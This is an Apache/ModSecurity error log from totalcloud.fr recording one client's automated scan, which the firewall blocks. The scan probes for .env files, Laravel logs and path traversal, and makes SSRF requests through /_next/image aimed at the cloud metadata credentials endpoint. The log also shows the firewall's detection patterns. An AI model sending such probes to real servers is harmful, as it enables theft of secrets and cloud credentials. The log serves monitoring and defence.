[Tue May 12 02:39:42.065499 2026] [security2:error] [pid 1709071:tid 1709094] [client 93.123.109.164:37914] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/api/.env"] [unique_id "agJ2zrvMumyrWMfSu7qo1AAAAMc"]
[Tue May 12 02:39:42.065622 2026] [:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.065763 2026] [security2:error] [pid 1709071:tid 1709094] [client 93.123.109.164:37914] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zrvMumyrWMfSu7qo1AAAAMc"]
[Tue May 12 02:39:42.085346 2026] [security2:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2zrvMumyrWMfSu7qo1QAAAMI"]
[Tue May 12 02:39:42.085458 2026] [security2:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agJ2zrvMumyrWMfSu7qo1QAAAMI"]
[Tue May 12 02:39:42.085674 2026] [security2:error] [pid 1709071:tid 1709089] [client 93.123.109.164:37982] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zrvMumyrWMfSu7qo1QAAAMI"]
[Tue May 12 02:39:42.085808 2026] [:error] [pid 1695975:tid 1696002] [client 93.123.109.164:37892] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.085869 2026] [:error] [pid 1709071:tid 1709094] [client 93.123.109.164:37914] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.086941 2026] [:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.115397 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "totalcloud.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agJ2zrOxS7i6i_mT2NLHVAAAAFU"]
[Tue May 12 02:39:42.115601 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agJ2zrOxS7i6i_mT2NLHVAAAAFU"]
[Tue May 12 02:39:42.112471 2026] [:error] [pid 1695975:tid 1695997] [client 93.123.109.164:37958] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.115884 2026] [security2:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zrOxS7i6i_mT2NLHVAAAAFU"]
[Tue May 12 02:39:42.120769 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "totalcloud.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ2zrOxS7i6i_mT2NLHVQAAAFM"]
[Tue May 12 02:39:42.121007 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "totalcloud.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ2zrOxS7i6i_mT2NLHVQAAAFM"]
[Tue May 12 02:39:42.121042 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "totalcloud.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ2zrOxS7i6i_mT2NLHVQAAAFM"]
[Tue May 12 02:39:42.121077 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ2zrOxS7i6i_mT2NLHVQAAAFM"]
[Tue May 12 02:39:42.121187 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agJ2zrOxS7i6i_mT2NLHVQAAAFM"]
[Tue May 12 02:39:42.121450 2026] [security2:error] [pid 1707624:tid 1707701] [client 93.123.109.164:37904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zrOxS7i6i_mT2NLHVQAAAFM"]
[Tue May 12 02:39:42.135835 2026] [autoindex:error] [pid 1730207:tid 1730226] [client 93.123.109.164:37816] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:39:42.140272 2026] [:error] [pid 1730175:tid 1730188] [client 93.123.109.164:37774] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.140734 2026] [autoindex:error] [pid 1695975:tid 1695999] [client 93.123.109.164:37806] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://totalcloud.fr/admin
[Tue May 12 02:39:42.190290 2026] [autoindex:error] [pid 1695975:tid 1695997] [client 93.123.109.164:37958] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 02:39:42.192191 2026] [:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.325206 2026] [security2:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env#"] [unique_id "agJ2zrOxS7i6i_mT2NLHVgAAAEQ"]
[Tue May 12 02:39:42.325459 2026] [security2:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env#"] [unique_id "agJ2zrOxS7i6i_mT2NLHVgAAAEQ"]
[Tue May 12 02:39:42.326776 2026] [security2:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zrOxS7i6i_mT2NLHVgAAAEQ"]
[Tue May 12 02:39:42.332670 2026] [:error] [pid 1709071:tid 1709090] [client 93.123.109.164:37778] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.386221 2026] [security2:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.example"] [unique_id "agJ2zrOxS7i6i_mT2NLHVwAAAEQ"]
[Tue May 12 02:39:42.386415 2026] [security2:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.example"] [unique_id "agJ2zrOxS7i6i_mT2NLHVwAAAEQ"]
[Tue May 12 02:39:42.386706 2026] [security2:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zrOxS7i6i_mT2NLHVwAAAEQ"]
[Tue May 12 02:39:42.393125 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "totalcloud.fr"] [uri "/_next/image"] [unique_id "agJ2zno6NvB9WXx5V-55KQAAAQo"]
[Tue May 12 02:39:42.393795 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/_next/image"] [unique_id "agJ2zno6NvB9WXx5V-55KQAAAQo"]
[Tue May 12 02:39:42.394479 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zno6NvB9WXx5V-55KQAAAQo"]
[Tue May 12 02:39:42.404607 2026] [:error] [pid 1695975:tid 1695997] [client 93.123.109.164:37958] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.406455 2026] [:error] [pid 1691274:tid 1691279] [client 93.123.109.164:37934] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.406353 2026] [:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.414374 2026] [:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.414390 2026] [:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.448820 2026] [:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.450750 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "totalcloud.fr"] [uri "/_next/image/"] [unique_id "agJ2zno6NvB9WXx5V-55LgAAAQo"]
[Tue May 12 02:39:42.450802 2026] [:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.451455 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/_next/image/"] [unique_id "agJ2zno6NvB9WXx5V-55LgAAAQo"]
[Tue May 12 02:39:42.451757 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zno6NvB9WXx5V-55LgAAAQo"]
[Tue May 12 02:39:42.455393 2026] [:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.874581 2026] [:error] [pid 1691274:tid 1691279] [client 93.123.109.164:37934] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.876126 2026] [security2:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "totalcloud.fr"] [uri "/_next/image/"] [unique_id "agJ2zlfdQaraX_prmqceQgAAABU"]
[Tue May 12 02:39:42.876442 2026] [:error] [pid 1730175:tid 1730187] [client 93.123.109.164:37888] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.876675 2026] [:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.877272 2026] [autoindex:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: https://totalcloud.fr/admin
[Tue May 12 02:39:42.877832 2026] [security2:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/_next/image/"] [unique_id "agJ2zlfdQaraX_prmqceQgAAABU"]
[Tue May 12 02:39:42.877868 2026] [:error] [pid 1695975:tid 1695997] [client 93.123.109.164:37958] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.879230 2026] [security2:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agJ2zlfdQaraX_prmqceQgAAABU"]
[Tue May 12 02:39:42.882116 2026] [:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.900098 2026] [:error] [pid 1691274:tid 1691279] [client 93.123.109.164:37934] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.904601 2026] [:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.905007 2026] [:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.906199 2026] [:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.935461 2026] [:error] [pid 1709071:tid 1709107] [client 93.123.109.164:37814] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.935750 2026] [:error] [pid 1707624:tid 1707686] [client 93.123.109.164:37988] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.936551 2026] [:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.937847 2026] [:error] [pid 1707624:tid 1707703] [client 93.123.109.164:37856] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.938817 2026] [:error] [pid 1691274:tid 1691279] [client 93.123.109.164:37934] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:42.939924 2026] [:error] [pid 1695975:tid 1695997] [client 93.123.109.164:37958] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 02:39:43.006380 2026] [:error] [pid 1691274:tid 1691490] [client 93.123.109.164:37918] File does not exist: /home/totalcloud/public_html/index.php
